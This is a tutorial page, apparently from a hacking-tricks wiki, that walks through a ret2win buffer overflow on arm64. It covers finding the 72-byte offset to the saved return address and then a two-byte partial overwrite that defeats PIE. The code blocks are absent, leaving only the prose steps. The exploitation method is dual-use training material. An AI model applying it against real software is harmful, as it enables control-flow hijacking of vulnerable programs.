Ret2win - arm64
Last updated
Last updated
Learn & practice AWS Hacking: Learn & practice GCP Hacking:
Find an introduction to arm64 in:
Compile without pie and canary:
Stat gdb with gef, create pattern and use it:
arm64 will try to return to the address in the register x30 (which was compromised), we can use that to find the pattern offset:
The offset is 72 (9x48).
Start by getting the stack address where the pc register is stored:
Now set a breakpoint after the read()
and continue until the read()
is executed and set a pattern such as 13371337:
Find where this pattern is stored in memory:
Then: 0xfffffffff148 - 0xfffffffff100 = 0x48 = 72
Get the address of the win
function:
Exploit:
Actually this is going to by more like a off-by-2 in the stored PC in the stack. Instead of overwriting all the return address we are going to overwrite only the last 2 bytes with 0x06c4
.
Compile the binary without the -no-pie
argument
Without a leak we don't know the exact address of the winning function but we can know the offset of the function from the binary and knowing that the return address we are overwriting is already pointing to a close address, it's possible to leak the offset to the win function (0x7d4) in this case and just use that offset:
This example was created using :
You can find another off-by-one example in ARM64 in , which is a real off-by-one in a fictitious vulnerability.
Learn & practice AWS Hacking: Learn & practice GCP Hacking:
Check the !
Join the 💬 or the or follow us on Twitter 🐦 .
Share hacking tricks by submitting PRs to the and github repos.